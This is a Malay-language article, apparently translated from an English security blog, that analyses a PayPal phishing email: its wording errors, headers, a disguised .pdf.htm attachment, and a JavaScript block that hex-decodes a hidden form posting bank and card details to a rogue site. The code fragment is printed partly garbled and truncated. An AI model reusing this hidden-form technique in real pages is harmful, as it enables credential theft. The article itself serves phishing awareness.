Keselamatan Dalam Talian: Memecahkan Anatomi E-mel Phishing


Dalam dunia hari ini di mana maklumat semua orang berada dalam talian, pancingan data ialah salah satu daripada serangan dalam talian yang paling popular dan dahsyat, kerana anda sentiasa boleh membersihkan virus, tetapi jika butiran perbankan anda dicuri, anda menghadapi masalah. Berikut ialah pecahan satu serangan sedemikian yang kami terima.



Jangan fikir bahawa butiran perbankan anda sahaja yang penting: lagipun, jika seseorang mendapat kawalan ke atas log masuk akaun anda, mereka bukan sahaja mengetahui maklumat yang terkandung dalam akaun itu, tetapi kemungkinan besar maklumat log masuk yang sama boleh digunakan pada pelbagai akaun lain. akaun. Dan jika mereka menjejaskan akaun e-mel anda, mereka boleh menetapkan semula semua kata laluan anda yang lain.

Jadi selain daripada mengekalkan kata laluan yang kukuh dan berbeza-beza, anda perlu sentiasa memerhatikan e-mel palsu yang menyamar sebagai perkara sebenar. Manakala kebanyakan pancingan data percubaan adalah amatur, ada yang agak meyakinkan jadi adalah penting untuk memahami cara mengenalinya di peringkat permukaan serta cara ia berfungsi di bawah tudung.





BERKAITAN: Mengapa Mereka Mengeja Phishing Dengan 'ph?' Satu Penghormatan Yang Tidak Mungkin

Imej oleh asirap



Memeriksa Apa yang Ada dalam Penglihatan Biasa

E-mel contoh kami, seperti kebanyakan percubaan pancingan data, memberitahu anda tentang aktiviti pada akaun PayPal anda yang, dalam keadaan biasa, membimbangkan. Jadi seruan untuk bertindak adalah untuk mengesahkan/memulihkan akaun anda dengan menyerahkan hampir setiap maklumat peribadi yang boleh anda fikirkan. Sekali lagi, ini cukup formula.

Walaupun terdapat pengecualian, hampir setiap e-mel pancingan data dan penipuan dimuatkan dengan bendera merah terus dalam mesej itu sendiri. Walaupun teks itu meyakinkan, anda biasanya boleh menemui banyak kesilapan yang berselerak di seluruh badan mesej yang menunjukkan mesej itu tidak sah.

Badan Mesej



Iklan

Pada pandangan pertama, ini adalah salah satu e-mel pancingan data yang lebih baik yang pernah saya lihat. Tiada kesalahan ejaan atau tatabahasa dan kata kerjanya dibaca mengikut apa yang anda jangkakan. Walau bagaimanapun, terdapat beberapa tanda merah yang boleh anda lihat apabila anda meneliti kandungannya dengan lebih teliti.

  • Paypal – Kes yang betul ialah PayPal (modal P). Anda boleh melihat kedua-dua variasi digunakan dalam mesej. Syarikat sangat berhati-hati dengan penjenamaan mereka, jadi diragui sesuatu seperti ini akan lulus proses kalis.
  • benarkan ActiveX – Berapa kali anda pernah melihat perniagaan berasaskan web yang sah bersaiz Paypal menggunakan komponen proprietari yang hanya berfungsi pada satu pelayar, terutamanya apabila mereka menyokong berbilang pelayar? Pasti, di suatu tempat di luar sana sesetengah syarikat melakukannya, tetapi ini adalah bendera merah.
  • dengan selamat. – Perhatikan bagaimana perkataan ini tidak berbaris dalam margin dengan teks perenggan yang lain. Walaupun saya meregangkan tingkap lebih sedikit, ia tidak membalut atau meruang dengan betul.
  • Paypal ! – Ruang sebelum tanda seru kelihatan janggal. Satu lagi keanehan yang saya pasti tidak akan ada dalam e-mel yang sah.
  • PayPal- Borang Kemas Kini Akaun.pdf.htm – Mengapakah Paypal melampirkan PDF terutamanya apabila mereka hanya boleh memaut ke halaman di tapak mereka? Selain itu, mengapa mereka cuba menyamar fail HTML sebagai PDF? Ini adalah bendera merah terbesar daripada mereka semua.

Pengepala Mesej

Apabila anda melihat pada pengepala mesej, beberapa lagi bendera merah muncul:

  • Alamat dari ialah test@test.com .
  • Alamat kepada tiada. Saya tidak mengosongkan ini, ia bukan sebahagian daripada pengepala mesej standard. Biasanya syarikat yang mempunyai nama anda akan memperibadikan e-mel kepada anda.

Lampiran

Apabila saya membuka lampiran, anda boleh melihat dengan serta-merta susun aturnya tidak betul kerana ia tiada maklumat gaya. Sekali lagi, mengapa PayPal menghantar borang HTML melalui e-mel sedangkan mereka hanya boleh memberi anda pautan di tapak mereka?

Nota: kami menggunakan pemapar lampiran HTML terbina dalam Gmail untuk ini, tetapi kami mengesyorkan agar anda JANGAN BUKA lampiran daripada penipu. tidak pernah. pernah. Mereka selalunya mengandungi eksploitasi yang akan memasang trojan pada PC anda untuk mencuri maklumat akaun anda.

Menatal ke bawah sedikit lagi, anda dapat melihat bahawa borang ini meminta bukan sahaja untuk maklumat log masuk PayPal kami, tetapi untuk maklumat perbankan dan kad kredit juga. Beberapa imej rosak.

Jelas sekali percubaan pancingan data ini akan mengejar segala-galanya dengan sekali gus.

Pecahan Teknikal

Walaupun ia sepatutnya agak jelas berdasarkan perkara yang jelas bahawa ini adalah percubaan pancingan data, kami kini akan memecahkan solekan teknikal e-mel dan melihat apa yang boleh kami temui.

Maklumat daripada Lampiran

Iklan

Perkara pertama yang perlu dilihat ialah sumber HTML borang lampiran yang menyerahkan data ke tapak palsu.

Apabila melihat sumber dengan cepat, semua pautan kelihatan sah kerana ia menunjukkan sama ada paypal.com atau paypalobjects.com yang kedua-duanya sah.

Sekarang kita akan melihat beberapa maklumat halaman asas yang Firefox kumpulkan pada halaman tersebut.

Seperti yang anda lihat, beberapa grafik diambil daripada domain blessedtobe.com, goodhealthpharmacy.com dan pic-upload.de dan bukannya domain PayPal yang sah.

Maklumat daripada Pengepala E-mel

Seterusnya kita akan melihat pada pengepala mesej e-mel mentah. Gmail menyediakan ini melalui pilihan menu Tunjukkan Asal pada mesej.

Iklan

Melihat maklumat pengepala untuk mesej asal, anda boleh melihat mesej ini dikarang menggunakan Outlook Express 6. Saya ragu PayPal mempunyai seseorang kakitangan yang menghantar setiap mesej ini secara manual melalui klien e-mel yang sudah lapuk.

Sekarang melihat maklumat penghalaan, kita boleh melihat alamat IP kedua-dua pengirim dan pelayan mel penyampai.

Alamat IP Pengguna adalah pengirim asal. Melakukan carian pantas pada maklumat IP, kita dapat melihat IP penghantaran adalah di Jerman.

Dan apabila kita melihat pada pelayan mel yang menyampaikan (mail.itak.at), alamat IP kita dapat melihat ini adalah ISP yang berpangkalan di Austria. Saya ragu PayPal mengarahkan e-mel mereka secara terus melalui ISP yang berpangkalan di Austria apabila mereka mempunyai ladang pelayan besar yang boleh mengendalikan tugas ini dengan mudah.

Ke Mana Perginya Data?

Jadi kami telah menentukan dengan jelas bahawa ini adalah e-mel pancingan data dan mengumpulkan beberapa maklumat tentang dari mana mesej itu berasal, tetapi bagaimana pula dengan tempat data anda dihantar?

Untuk melihat ini, kita perlu terlebih dahulu menyimpan lampiran HTM melakukan desktop kita dan buka dalam editor teks. Menatal melaluinya, semuanya kelihatan teratur kecuali apabila kita sampai ke blok Javascript yang kelihatan mencurigakan.

Iklan

Memecahkan sumber penuh blok terakhir Javascript, kita lihat:


// Hak Cipta © 2005 Voormedia – WWW.VOORMEDIA.COM
var i, y, x = 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e; y =, sebab (i = 0; i

Pada bila-bila masa anda melihat rentetan besar bercampur aduk huruf dan nombor yang kelihatan rawak tertanam dalam blok Javascript, ia biasanya sesuatu yang mencurigakan. Melihat pada kod, pembolehubah x ditetapkan kepada rentetan besar ini dan kemudian dinyahkodkan ke dalam pembolehubah y. Hasil akhir pembolehubah y kemudian ditulis pada dokumen sebagai HTML.

Oleh kerana rentetan besar diperbuat daripada nombor 0-9 dan huruf a-f, kemungkinan besar ia dikodkan melalui penukaran ASCII kepada Hex yang mudah:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e6532672f670e3d22687474703

Diterjemahkan kepada:

Ia bukan satu kebetulan bahawa ini menyahkod menjadi teg borang HTML yang sah yang menghantar hasil bukan kepada PayPal, tetapi ke tapak penyangak.

Selain itu, apabila anda melihat sumber HTML borang, anda akan melihat bahawa teg borang ini tidak kelihatan kerana ia dijana secara dinamik melalui Javascript. Ini adalah cara bijak untuk menyembunyikan perkara yang sebenarnya dilakukan oleh HTML jika seseorang hanya melihat sumber lampiran yang dijana (seperti yang kami lakukan sebelum ini) berbanding dengan membuka lampiran secara langsung dalam editor teks.

Menjalankan whois pantas di tapak yang menyinggung perasaan, kita dapat melihat ini adalah domain yang dihoskan pada hos web popular, 1dan1.

Iklan

Apa yang menonjol ialah domain menggunakan nama yang boleh dibaca (berbanding dengan sesuatu seperti dfh3sjhskjhw.net) dan domain itu telah didaftarkan selama 4 tahun. Disebabkan ini, saya percaya domain ini telah dirampas dan digunakan sebagai bidak dalam percubaan pancingan data ini.

Sinis adalah Pertahanan yang Baik

Apabila bercakap tentang kekal selamat dalam talian, tidak ada salahnya untuk mempunyai sedikit rasa sinis.

Walaupun saya pasti terdapat lebih banyak tanda merah dalam e-mel contoh, perkara yang telah kami nyatakan di atas adalah petunjuk yang kami lihat selepas hanya beberapa minit pemeriksaan. Secara hipotesis, jika tahap permukaan e-mel meniru rakan sejawatannya yang sah 100%, analisis teknikal masih akan mendedahkan sifat sebenar e-mel tersebut. Inilah sebabnya penting untuk dapat memeriksa kedua-dua perkara yang anda boleh lihat dan tidak boleh lihat.

BACA SETERUSNYA

Artikel Yang Menarik